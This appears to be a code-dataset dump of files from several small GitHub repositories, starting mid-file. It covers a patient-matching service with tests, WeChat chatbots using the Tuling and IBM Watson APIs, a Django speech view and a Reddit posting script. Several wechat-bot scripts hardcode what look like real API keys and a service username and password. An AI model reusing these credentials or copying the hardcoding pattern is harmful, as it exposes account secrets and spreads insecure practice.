it is stored in database\n\n Returns:\n json_patient(dict): a patient object conforming to MME API\n \"\"\"\n json_patient = mme_patient\n if 'id' not in mme_patient:\n json_patient['id'] = json_patient['_id']\n if '_id' in json_patient:\n json_patient.pop('_id')\n\n return json_patient\n\n\ndef features_to_hpo(features):\n \"\"\"Extracts HPO terms from a list of phenotype features of a patient\n\n Args:\n features(list): a list of features dictionaries\n\n Returns:\n hpo_terms(list): a list of HPO terms. Example : ['HP:0100026', 'HP:0009882', 'HP:0001285']\n \"\"\"\n if features is None:\n return []\n hpo_terms = [feature.get('_id') for feature in features if feature.get('_id')]\n if len(hpo_terms) == 0:\n hpo_terms = [feature.get('id') for feature in features if feature.get('id')]\n return hpo_terms\n\n\ndef disorders_to_omim(disorders):\n \"\"\"Extracts OMIM terms from a list of disorders of a patient\n\n Args:\n disorders(list): a list of disorders\n\n Returns:\n omim_terms(list): a list of OMIM terms. 
Example : ['MIM:616007', 'MIM:614665']\n \"\"\"\n if disorders is None:\n return []\n omim_terms = [disorder.get('id') for disorder in disorders if disorder.get('id')]\n return omim_terms\n\n\ndef format_genes(patient_obj):\n \"\"\"Checks if patient's gFeatures gene ids are defined as ensembl ids.\n If they are entrez ids or symbols thet will be converted to ensembl IDs.\n\n Args:\n patient_obj(dict): A patient object with genotype features\n \"\"\"\n formatted_features = []\n for feature in patient_obj.get('genomicFeatures', []):\n symbol = None\n if 'gene' in feature and feature['gene'].get('id'):\n gene = feature['gene']['id']\n if gene.isdigit() or gene.startswith('ENSG') is False:\n if gene.isdigit(): #Likely an entrez gene ID\n LOG.info('Converting entrez gene {} to symbol'.format(gene))\n symbol = entrez_to_symbol(gene)\n else: # It's a gene symbol\n symbol = gene\n if symbol:\n LOG.info('Converting gene symbol {} to Ensembl'.format(symbol))\n ensembl_id = symbol_to_ensembl(symbol)\n if ensembl_id:\n feature['gene']['id'] = ensembl_id\n else: # gene id is Ensembl id\n symbol = ensembl_to_symbol(gene)\n\n if symbol:\n feature['gene']['_geneName'] = symbol # add non-standard but informative field\n\n formatted_features.append(feature)\n\n if formatted_features:\n patient_obj['genomicFeatures'] = formatted_features\n\n\ndef gtfeatures_to_genes(gtfeatures):\n \"\"\"Extracts all gene names from a list of genomic features\n Args:\n gtfeatures(list): a list of genomic features objects\n\n Returns:\n gene_set(list): a list of unique gene names contained in the features\n \"\"\"\n genes = []\n for feature in gtfeatures:\n if 'gene' in feature and feature['gene'].get('id'): # collect non-null gene IDs\n genes.append(feature['gene']['id'])\n gene_set = list(set(genes))\n return gene_set\n\n\ndef gtfeatures_to_variants(gtfeatures):\n \"\"\"Extracts all variants from a list of genomic features\n\n Args:\n gtfeatures(list): a list of genomic features objects\n\n 
Returns:\n variants(list): a list of variants\n \"\"\"\n variants = []\n for feature in gtfeatures:\n if 'variant' in feature:\n variants.append(feature['variant'])\n\n return variants\n\n\ndef validate_api(json_obj, is_request):\n \"\"\"Validates a request against the MME API\n The code for the validation against the API and the API specification is taken from\n this project: https://github.com/MatchmakerExchange/reference-server\n\n Args:\n json_obj(dict): json request or response to validate\n is_request(bool): True if it is a request, False if it is a response\n\n Returns\n validated(bool): True or False\n \"\"\"\n validated = True\n schema = '#/definitions/response'\n if is_request:\n schema = '#/definitions/request'\n\n LOG.info(\"Validating against SCHEMA {}\".format(schema))\n\n # get API definitions\n schema_data = json.loads(get_data('patientMatcher.resources', SCHEMA_FILE).decode('utf-8'))\n resolver = RefResolver.from_schema(schema_data)\n format_checker = FormatChecker()\n resolver_schema = resolver.resolve_from_url(schema)\n validate(json_obj, resolver_schema, resolver=resolver, format_checker=format_checker)\n" }, { "alpha_fraction": 0.7967479825019836, "alphanum_fraction": 0.7967479825019836, "avg_line_length": 7.785714149475098, "blob_id": "b7374754c40fdb7212c159a02471300509a69673", "content_id": "ce358e8235846340c97ccdee2c5bae71127a96be", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 123, "license_type": "permissive", "max_line_length": 22, "num_lines": 14, "path": "/requirements.txt", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "## server\nFlask\nFlask-Mail\nflask-negotiate\nrequests\njsonschema\n\n\n## database connection\npymongo\n\n##backend\nenlighten\nclint\n" }, { "alpha_fraction": 0.6743008494377136, "alphanum_fraction": 0.6897299885749817, "avg_line_length": 40.069305419921875, "blob_id": "d6dd4aa21c043d35c0656410c1db4e83a621a47f", "content_id": 
"d74a0294f5af099ae6007841c16b8ee3faabac50", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4148, "license_type": "permissive", "max_line_length": 118, "num_lines": 101, "path": "/tests/match/test_matching_handler.py", "repo_name": "ousamg/patientMatcher", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport requests\nfrom patientMatcher.utils.add import backend_add_patient\nfrom patientMatcher.parse.patient import mme_patient\nfrom patientMatcher.match.handler import internal_matcher, save_async_response, external_matcher\n\ndef test_internal_matching(database, gpx4_patients):\n \"\"\"Testing the combined matching algorithm\"\"\"\n\n # load 2 test patients in mock database\n for patient in gpx4_patients:\n mme_pat = mme_patient(patient, True) # convert gene symbol to ensembl\n database['patients'].insert_one(mme_pat).inserted_id\n\n # 2 patients should be inserted\n results = database['patients'].find({'genomicFeatures.gene.id': 'ENSG00000167468'})\n assert len(list(results)) == 2\n\n # test matching of one of the 2 patients against both patients in database\n proband_patient = mme_patient(gpx4_patients[0], True)\n\n match = internal_matcher(database, proband_patient, 0.5, 0.5)\n match_patients = match['results'][0]['patients']\n assert len(match_patients) == 2\n\n higest_scored_patient = match_patients[0] # first returned patient has higher score\n lowest_scored_patient = match_patients[-1] # last returned patient has lower score\n\n assert higest_scored_patient['score']['patient'] > lowest_scored_patient['score']['patient']\n\n\ndef test_internal_matching_with_threshold(database, gpx4_patients):\n # load 2 test patients in mock database\n for patient in gpx4_patients:\n mme_pat = mme_patient(patient, True) # convert gene symbol to ensembl\n database['patients'].insert_one(mme_pat).inserted_id\n\n # 2 patients should be inserted\n results = 
database['patients'].find({'genomicFeatures.gene.id': 'ENSG00000167468'})\n assert len(list(results)) == 2\n\n # test matching of one of the 2 patients against both patients in database\n proband_patient = mme_patient(gpx4_patients[0], True)\n\n match = internal_matcher( database=database, patient_obj=proband_patient, max_pheno_score=0.5, max_geno_score=0.5,\n max_results=5, score_threshold=0.5)\n match_patients = match['results'][0]['patients']\n assert len(match_patients) == 1 # one patient is filtered out by search threshold\n\n\ndef test_external_matching(database, test_node, gpx4_patients, monkeypatch):\n \"\"\"Testing the function that trigger patient matching across connected nodes\"\"\"\n\n patient = gpx4_patients[0]\n\n # insert test node object in database\n database['nodes'].insert_one(test_node)\n\n # insert patient object in database\n inserted_ids = backend_add_patient(mongo_db=database, patient=patient, match_external=False)\n assert inserted_ids\n\n class MockResponse(object):\n def __init__(self):\n self.status_code = 200\n def json(self):\n resp = {\n \"disclaimer\" : \"This is a test disclaimer\",\n \"results\" : gpx4_patients\n }\n return resp\n\n def mock_response(*args, **kwargs):\n return MockResponse()\n\n monkeypatch.setattr( requests , 'request', mock_response )\n\n ext_m_result = external_matcher(database, patient, test_node['_id'])\n assert isinstance(ext_m_result, dict)\n assert ext_m_result['data']['patient']['id'] == patient['id']\n assert ext_m_result['has_matches'] == True\n assert ext_m_result['match_type'] == 'external'\n\n\ndef test_save_async_response(database, test_node):\n \"\"\"Testing the function that saves an async response object to database\"\"\"\n\n # Test database should not contain async responses\n results = database['async_responses'].find()\n assert len(list(results)) == 0\n\n # Save an async response using the matching handler\n save_async_response(database=database, node_obj=test_node,\n query_id='test', 
query_patient_id='test_patient')\n\n # async_responses database collection should now contain one object\n async_response = database['async_responses'].find_one()\n assert async_response['query_id'] == 'test'\n assert async_response['query_patient_id'] == 'test_patient'\n assert async_response['node']['id'] == test_node['_id']\n assert async_response['node']['label'] == test_node['label']\n" } ]
28
Alexander1022/Reddit-Automation
https://github.com/Alexander1022/Reddit-Automation
b08afa6b2cdbedcde77eafc7b599b18d27f52f38
c1348e78941a33de20d6eb89f54a25b7aad2218b
e0f2e1d5f68ed063809ff84a71de8ab98c1377a1
refs/heads/main
2023-04-15T06:38:33.309632
2021-04-29T15:33:13
2021-04-29T15:33:13
362,858,818
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6388415694236755, "alphanum_fraction": 0.640545129776001, "avg_line_length": 29.921052932739258, "blob_id": "787429210ee18097243eb8f6794bc8bb992ef8fa", "content_id": "4ecb49781ecd9ea5c595246aae76a8291bfe2364", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1174, "license_type": "permissive", "max_line_length": 111, "num_lines": 38, "path": "/main.py", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "import praw, requests, json, time\n\nsubreddit_choice = 'Python'\nconfig_file = 'config.json'\n\nwith open(config_file) as f:\n credentials = json.load(f)\n\nreddit = praw.Reddit(client_id = credentials['client_id'],\n client_secret=credentials['client_secret'],\n user_agent=credentials['user_agent'],\n redirect_uri=credentials['redirect_uri'],\n refresh_token=credentials['refresh_token'])\n\nif not credentials['refresh_token']:\n print(\"Please fill the config file.\")\n exit()\n\nsubreddit = reddit.subreddit(subreddit_choice)\nprint(\"You are posting to \\\"\" + str(subreddit_choice) + \"\\\"\")\n\ntitle=input(\"What title do you want: \")\ncontent = input(\"What text do you want (you can leave it empty in some subs): \")\nnsfw_check = input(\"Is the post NSFW: \")\n\nif(nsfw_check == 'yes'):\n nsfw = True\nelse:\n nsfw = False\n\nsubreddit.submit(title, selftext = content, nsfw = nsfw)\nreddit.validate_on_submit = True\n\nprint(\"[POSTING]\\n\" + \"Title: \" + str(title) + \"\\n\" + \"Content: \" + str(content) + \"\\n\" + \"NSFW: \" + str(nsfw))\n\n# reddit posts the content after about 3 seconds\ntime.sleep(3)\nprint(\"[POSTED]\")" }, { "alpha_fraction": 0.6031344532966614, "alphanum_fraction": 0.6228513717651367, "avg_line_length": 30.919355392456055, "blob_id": "3484b9619b2840d818305608625118af69e60466", "content_id": "8080d705121abdfd221dbd1f9993fb95fbb7aa72", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 1978, "license_type": "permissive", "max_line_length": 94, "num_lines": 62, "path": "/generate-key.py", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "import random, socket, sys, praw\n \ndef receive_connection():\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server.bind((\"localhost\", 3221))\n server.listen(1)\n client = server.accept()[0]\n server.close()\n return client\n \ndef send_message(client, message):\n print(message)\n client.send(f\"HTTP/1.1 200 OK\\r\\n\\r\\n{message}\".encode(\"utf-8\"))\n client.close()\n\ndef main():\n print(\"Create your token here: \", \"https://www.reddit.com/prefs/apps/\")\n\n print(\"Go to http://localhost:3221 and follow the steps.\")\n\n client_id = input(\"Enter the client ID: \")\n client_secret = input(\"Enter the client secret key: \")\n\n commaScopes = input(\"Now enter a comma separated list of scopes, or all for all tokens: \")\n \n if commaScopes.lower() == \"all\":\n scopes = [\"*\"]\n else:\n scopes = commaScopes.strip().split(\",\")\n \n reddit = praw.Reddit(\n client_id=client_id.strip(),\n client_secret=client_secret.strip(),\n redirect_uri=\"http://localhost:3221\",\n user_agent=\"python-automation\",\n )\n state = str(random.randint(0, 65000))\n url = reddit.auth.url(scopes, state, \"permanent\")\n print(f\"Now open this url in your browser: {url}\")\n sys.stdout.flush()\n \n client = receive_connection()\n data = client.recv(1024).decode(\"utf-8\")\n param_tokens = data.split(\" \", 2)[1].split(\"?\", 1)[1].split(\"&\")\n params = { key: value for (key, value) in [token.split(\"=\") for token in param_tokens] }\n \n if state != params[\"state\"]:\n send_message(client, f\"State mismatch. 
Expected: {state} Received: {params['state']}\")\n return 1\n\n elif \"error\" in params:\n send_message(client, params[\"error\"])\n return 1\n \n refresh_token = reddit.auth.authorize(params[\"code\"])\n send_message(client, f\"Refresh token: {refresh_token}\")\n return 0\n \n \nif __name__ == \"__main__\":\n sys.exit(main())" }, { "alpha_fraction": 0.7018561363220215, "alphanum_fraction": 0.7111368775367737, "avg_line_length": 34.91666793823242, "blob_id": "38337ebbf6e5ba3d9eb6cfc7aaaf53896ff1c066", "content_id": "e2671876374b7c335d5f11b36e91675b987413f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 862, "license_type": "permissive", "max_line_length": 137, "num_lines": 24, "path": "/README.md", "repo_name": "Alexander1022/Reddit-Automation", "src_encoding": "UTF-8", "text": "# Reddit Automation with Python\n\n\nThis project is called **Reddit Automation**. You can post in Reddit from the terminal. It's faster and easier. \n\n![Reddit Logo](./reddit-logo.png)\n\n# Files\n\nIn the project you have 3 files:\n \n\n 1. **main** - run in the end when you are done with the files bellow\n 2. **generate-key** - with this file you can generate **refresh token**\n 3. **config** - in this file you have to write you client id, secret key and refresh token that you generated with **generate-key** file\n\n## How to use\n1. Go to [Reddit Apps Page](https://www.reddit.com/prefs/apps) and create a new app. \n2. Look for CLIENT ID and SECRET KEY.\n3. Run `python generate-key.py` to generate a refresh token.\n4. Run `python main.py` and follow the steps. \n*Disclaimer: by default the subreddit is set to **Python**. You can change it from main.py.*\n\nEnjoy! :)\n" } ]
3
Jonathanliu92251/wechat-bot
https://github.com/Jonathanliu92251/wechat-bot
ae29fd8f5b9456eda496da8d35e6a06ab6b00b3c
8b7628bb7f1c2bee2573c6923e268b163f89729c
dc73fe10b9e7376a18e087c850d37ed5e00361d9
refs/heads/master
2020-03-25T20:12:19.167631
2018-08-09T08:52:06
2018-08-09T08:52:06
144,120,749
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6458684802055359, "alphanum_fraction": 0.6728498935699463, "avg_line_length": 23.70833396911621, "blob_id": "518219c6a923784dfab03d9ad50890e17ee6fd14", "content_id": "abb3720bf85b83bf9b0cfe4d6dc11e0cbb480c76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 59, "num_lines": 24, "path": "/wechat/tuling.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\n\[email protected]_register([TEXT])\ndef text_reply(msg):\n info = msg['Text'].encode('UTF-8')\n url ='http://www.tuling123.com/openapi/api'\n data={u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \"info\":info, u\"loc\":\"\", \"userid\":\"\"}\n data = urllib.urlencode(data)\n\n url2 = urllib2.Request(url,data)\n \n response = urllib2.urlopen(url2)\n\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n print 's==',s\n if s['code'] == 100000:\n itchat.send( s['text'], msg['FromUserName'])\n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6856464743614197, "alphanum_fraction": 0.7034400701522827, "avg_line_length": 29.636363983154297, "blob_id": "cec4c5e34ff5f4cdcec4122fc9ce210d02c70494", "content_id": "f06fa5e2052ecc9af3cd560992ba07fcf9e8a4cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1686, "license_type": "no_license", "max_line_length": 116, "num_lines": 55, "path": "/README.md", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "## Setup & Run\n1. install python runtime\n1. install itchat: pip install itchat\n1. apply service from Tuling ( www.tuling123.com )\n1. apply service & create conversation from IBM Bluemix ( bluemix.net )\n1. 
install watson SDK: $ sudo -H pip install --ignore-installed six watson-developer-cloud\n1. modify credentials\n1. python xx.py \n2. follow wechat \"Smartcamp\"\n3. Interactive conversation w/ \"Smartcamp\" as follows:\n\n![WeChat](wx.jpg)\n\n\n\n## List of wechat\nComponent | Description | Reference\n|-----------------|----------------------------------|-----------------------|\n|tuling.py | wechat robot, w/ Tuling backend API | http://www.tuling123.com|\ntuling-specUser.py | chat service, restricted for specific wechat-usergroup| https://github.com/littlecodersh/ItChat\nwatson-console.py | console-based example for waston-conversation\nwatson-wechat.py | wechat as client | https://github.com/watson-developer-cloud/python-sdk\nwatson-tuling-wechat.py | wechat client + 2*backends ( # for Tuling, #IBM for Watson )\n\n\n## Console Apps\n### list\n* example1.js\n* example2.js\n* example3.js\n* example4.js\n\n### How to run\n\n* npm install\n* modify credentials\n* nodejs exampleX.js\n\n\n## List of nodered\nwatson-debugMode.json | waston-conversation, running in debug mode\n|:-----|:------|\nwatson-sockets.js | run in web mode, socket communication\n\n## How to modify & debug\n1. create **node-red** application in **IBM Bluemix**\n2. create service Watson conversion\n3. launch **Node-red** application -- web designer\n4. import flow from above json\n5. modifiy 'conversation' node property in these flow\n\n**debug:**\n \n1. click flow (left input node)\n1. 
web: https://nodered-jon001.eu-gb.mybluemix.net/testing\n\n" }, { "alpha_fraction": 0.6033014059066772, "alphanum_fraction": 0.636847734451294, "avg_line_length": 26.617647171020508, "blob_id": "c33bdb98635c00f6cdb017cc57b74e4791ee4c8a", "content_id": "9834ff19ea5fc6389031f2cec58681bba3f5a427", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1910, "license_type": "no_license", "max_line_length": 87, "num_lines": 68, "path": "/wechat/watson-tuling-wechat.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python \n#-*- coding:utf-8 -*- \n\nimport itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\nfrom watson_developer_cloud import ConversationV1\n\nresponse={'context':{}} \nconversation_server ='#TURING'\n\[email protected]_register([TEXT])\ndef text_reply(msg):\n global conversation_server, request_text, response, response_text\n request_text = msg['Text'].encode('UTF-8')\n\n if request_text == '#IBM':\n conversation_server ='#IBM'\n response={'context':{}}\n itchat.send( 'Greetings from IBM Waston', msg['FromUserName'])\n \n if request_text == '#':\n conversation_server ='#TURING'\n \n # IBM Waston Conversation\n if conversation_server =='#IBM': \n conversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n workspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\n\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n \n if len( response['output']['text']) >0:\n response_text = response['output']['text'][0]\n else: \n response_text = \"No message\" \n\n itchat.send( response_text, msg['FromUserName'])\n \n # Turling Robot\n if conversation_server =='#TURING': \n url ='http://www.tuling123.com/openapi/api'\n request = urllib.urlencode({\n 
u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \n \"info\":request_text, \n u\"loc\":r\"北京市中关村\", \n \"userid\":\"\"})\n\n url2 = urllib2.Request(url,request) \n response = urllib2.urlopen(url2)\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n\n if s['code'] == 100000:\n response_text = s['text']\n else:\n response_text = r'问住我了?你太牛啦!'\n \n itchat.send( response_text, msg['FromUserName'])\n \n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6367484927177429, "alphanum_fraction": 0.6765453219413757, "avg_line_length": 30.91891860961914, "blob_id": "1ceae26eea04f779658693330515c8ecbda0ee94", "content_id": "d2385becb1a2ed98d0dad576d122181702c6c624", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 123, "num_lines": 37, "path": "/wechat/watson-console.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import json\nfrom watson_developer_cloud import ConversationV1\n\n#########################\n# message\n#########################\n\nconversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n# replace with your own workspace_id\nworkspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\ntry:\n\ttype(eval(reponse['context']))\nexcept:\n response = conversation.message(workspace_id=workspace_id, message_input={'text': 'Hello'})\n print \"not defined\"\nelse:\n response = conversation.message(workspace_id=workspace_id, message_input={'text': 'Hello'}, context=response['context'])\n print \"define response\"\n\nrespMsg = response['output']['text']\nprint 'response==', response\nif len(response['output']['text']) > 0:\n print response['output']['text'][0]\nelse:\n print \"no message\"\n\n\n# When you send multiple requests for the same conversation, include the\n# context object from the previous 
response.\n# response = conversation.message(workspace_id=workspace_id, message_input={\n# 'text': 'turn the wipers on'},\n# context=response['context'])\n# print(json.dumps(response, indent=2))\n" }, { "alpha_fraction": 0.6717216968536377, "alphanum_fraction": 0.7038358449935913, "avg_line_length": 26.341463088989258, "blob_id": "3ff673cae34e34d6c4c9d2c2f88179a51173d8a3", "content_id": "a5afa261566be36f90d1674451d1738b87254426", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1121, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/wechat/watson-wechat.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "import itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\nfrom watson_developer_cloud import ConversationV1\n\nresponse={'context':{}}\[email protected]_register([TEXT])\ndef text_reply(msg):\n global response\n request_text = msg['Text'].encode('UTF-8')\n conversation = ConversationV1(\n username='9c359fba-0692-4afa-afb1-bd5bf4d7e367',\n password='5Id2zfapBV6e',\n version='2017-04-21')\n\n # replace with your own workspace_id\n workspace_id = 'd3e50587-f36a-4bdf-bf3e-38c382e8d63a'\n\n print \"request ==>\", request_text\n\n try:\n\t type(eval(response))\n except:\n print \"first call\"\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n else:\n print \"continue call\"\n response = conversation.message(workspace_id=workspace_id, message_input={\n 'text': request_text}, context=response['context'])\n \n if len( response['output']['text']) >0:\n response_text = response['output']['text'][0]\n else: \n response_text = \"No message\"\n\n itchat.send( response_text, msg['FromUserName'])\n \nitchat.auto_login()\nitchat.run(debug=True)\n" }, { "alpha_fraction": 0.6466854810714722, "alphanum_fraction": 0.6847673058509827, "avg_line_length": 
21.870967864990234, "blob_id": "9136cb08d96a890b5792632f160d153674e4e5a3", "content_id": "fa0a53836cbde0b23423d996cacc25357461c727", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 68, "num_lines": 62, "path": "/wechat/tuling-specUser.py", "repo_name": "Jonathanliu92251/wechat-bot", "src_encoding": "UTF-8", "text": "#http://www.tuling123.com/member/center/, [email protected]/Passw0rd\n#layout: http://blog.csdn.net/thx9537/article/details/54850038\n#itchat: http://www.cnblogs.com/hzpythoner/p/7099022.html\n#sample source: https://pan.baidu.com/s/1bpAJk0B\n\n#!/usr/bin/env python\n# coding:utf8\n\nimport itchat, time, re\nfrom itchat.content import *\nimport urllib2, urllib\nimport json\n\[email protected]_register([TEXT,SHARING], isGroupChat=True)\ndef text_reply(msg):\n\n # 消息来自于哪个群聊\n chatroom_id = msg['FromUserName']\n # 发送者的昵称\n username = msg['ActualNickName']\n\n if msg['Type'] == TEXT:\n info = msg['Content'].encode('UTF-8')\n elif msg['Type'] == SHARING:\n info = msg['Text'].encode('UTF-8')\n\n\n # 消息并不是来自于需要同步的群\n if chatroom_id != chatroom_ids:\n print 'not monitored'\n print msg\n return\n\n\n# info = msg['Text'].encode('UTF-8')\n url ='http://www.tuling123.com/openapi/api'\n data={u\"key\":\"d83cddc3894946338cccd9bb752b497e\", \"info\":info, u\"loc\":\"\", \"userid\":\"\"}\n data = urllib.urlencode(data)\n\n url2 = urllib2.Request(url,data)\n \n response = urllib2.urlopen(url2)\n\n apicontent = response.read()\n s = json.loads( apicontent, encoding='utf-8')\n print 's==',s\n if s['code'] == 100000:\n itchat.send( s['text'], msg['FromUserName'])\n\n \nitchat.auto_login()\n\nchatrooms = itchat.get_chatrooms()\nchatrooms_ids = '' \n\nfor item in chatrooms:\n if item['NickName'] == u'家人':\n chatroom_ids = item['UserName']\n print item['NickName']\n print chatroom_ids\n \nitchat.run(debug=True)\n" } ]
6
jdpenuliar/selectionsortdjango
https://github.com/jdpenuliar/selectionsortdjango
6a360559070837a67b60e675e62940a2ceba7b2b
21cbe112e85fc4c92b016c8415662b51bfd1d7c3
823b5bae511f66a8e36a59ce087baeb54ddf6861
refs/heads/master
2021-01-22T22:13:16.951568
2017-03-20T00:34:13
2017-03-20T00:34:13
85,519,674
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5521343350410461, "alphanum_fraction": 0.5563331246376038, "avg_line_length": 31.454545974731445, "blob_id": "e57090248ae41f53c0801ae729f877365ac0b8d4", "content_id": "5de15635b3eaf9e017ce4f0ee88cad219b470b35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1429, "license_type": "no_license", "max_line_length": 123, "num_lines": 44, "path": "/apps/selectionSort/views.py", "repo_name": "jdpenuliar/selectionsortdjango", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, HttpResponse, redirect\n\n# Create your views here.\n\ndef swap(array, firstIndex, secondIndex):\n temp = array[firstIndex]\n array[firstIndex] = array[secondIndex]\n array[secondIndex] = temp\n return array \n\ndef indexMinimum(array, startIndex):\n minValue = array[startIndex]\n minIndex = startIndex\n\n for count in range (minIndex, len(array)):\n if array[count] < minValue: \n minIndex = count \n minValue = array[count]\n return minIndex\n\ndef sort(request):\n array = []\n if request.method == \"POST\":\n for count in range (0, len(request.POST['array'])):\n print (\"haha----\\n\", request.POST[\"array\"][count])\n if (request.POST[\"array\"][count] != \",\"):\n if (request.POST[\"array\"][count] == \"-\"):\n continue\n elif ((request.POST[\"array\"][count - 1] == \"-\" and count == 1) or request.POST[\"array\"][count - 2] == \"-\"):\n array.append(int(request.POST[\"array\"][count]) * -1) \n else:\n array.append(int(request.POST[\"array\"][count])) \n\n print (\"array----\\n\", array)\n for x in range (0, len(array)):\n y = indexMinimum(array, x)\n swap(array, x, y)\n\n print (\"array-----\\n\", array)\n\n return redirect('/') \n\ndef index(request):\n return render(request, 'selectionSort/index.html') \n" }, { "alpha_fraction": 0.7821782231330872, "alphanum_fraction": 0.7821782231330872, "avg_line_length": 19.200000762939453, "blob_id": "2b32076b13661b71d11c7197706eb4e436bad50e", "content_id": 
"23ea23c8ee7d49c18008f65dff5604cfdb2c209c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 101, "license_type": "no_license", "max_line_length": 37, "num_lines": 5, "path": "/apps/selectionSort/apps.py", "repo_name": "jdpenuliar/selectionsortdjango", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass SelectionsortConfig(AppConfig):\n name = 'selectionSort'\n" } ]
2
mplociennik/raspie
https://github.com/mplociennik/raspie
4d875ee96adced57853c96f070f702963fffc1df
a3160ac4dfdd9846e56a17558af7c00f8a5dd74a
e6edf1d8671668ccfcace0dfc5d00795ac547157
refs/heads/master
2021-01-17T10:32:00.768827
2016-10-14T21:12:27
2016-10-14T21:12:27
58,819,736
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6238095164299011, "alphanum_fraction": 0.6253968477249146, "avg_line_length": 32.157894134521484, "blob_id": "085226174b9349ab173a98b1ff55650b946a7eb1", "content_id": "9d50cfe4945f9d6660e7dc8516e6a9e4f9d5f000", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 630, "license_type": "no_license", "max_line_length": 63, "num_lines": 19, "path": "/src/webapi/speech/views.py", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.http import HttpResponse, HttpRequest\nfrom django.views.generic import View\nfrom django.conf import settings\nfrom django.shortcuts import render\n\nimport pyvona\n\nclass Speech(View):\n template_name = 'speech/test.html'\n\n def get(self, request, *args, **kwargs):\n if request.GET.get('text'):\n print request.GET['text']\n v = pyvona.create_voice(settings.IVONA_ACCESS_KEY, \n settings.IVONA_SECRET_KEY)\n v.voice_name = 'Jacek'\n v.speak(request.GET['text'])\n return render(request, self.template_name)\n" }, { "alpha_fraction": 0.7631579041481018, "alphanum_fraction": 0.7894737124443054, "avg_line_length": 56, "blob_id": "c39e31d3b29235c986ff360032f84dba0db5c10a", "content_id": "45d368445105582152724e25b6648ee87f0f05e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 114, "license_type": "no_license", "max_line_length": 104, "num_lines": 2, "path": "/README.md", "repo_name": "mplociennik/raspie", "src_encoding": "UTF-8", "text": "# raspie\nRaspie Robot is my learn project to build intelligent robot using Raspberry Pi 2 model B and Python 2.7.\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 9.714285850524902, "blob_id": "2163a1846c410c1a3341f00185319c9e8768d9ce", "content_id": "15bb0186720391f03f58028d3930f5a488832df5", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
